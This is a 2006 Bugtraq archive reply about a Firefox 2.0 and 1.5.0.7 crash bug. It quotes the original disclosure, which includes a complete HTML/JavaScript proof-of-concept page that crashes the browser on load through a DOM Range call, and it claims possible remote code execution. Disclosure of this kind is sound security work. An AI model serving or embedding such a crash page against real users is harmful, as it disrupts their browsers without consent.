Bugtraq mailing list archives

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

From: Gouki <Gouki () GoukiHQ org>
Date: Tue, 31 Oct 2006 19:05:14 +0000

Firefox 1.5.0.7 is also vulnerable (to DoS at least).

On Tue, 2006-10-31 at 09:24 +0000, xxxx () gmail com wrote:

New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>

Attachment: signature.asc
Description: This is a digitally signed message part

Current thread:

New Flaw in Firefox 2.0: DoS and possible remote code execution xxxx (Oct 31)
- Re: New Flaw in Firefox 2.0: DoS and possible remote code execution Gouki (Oct 31)
- Re: New Flaw in Firefox 2.0: DoS and possible remote code execution Josh Bressers (Oct 31)
- <Possible follow-ups>
- Re: Re: New Flaw in Firefox 2.0: DoS and possible remote code execution xxxx (Oct 31)
  - Re: New Flaw in Firefox 2.0: DoS and possible remote code execution Daniel Veditz (Oct 31)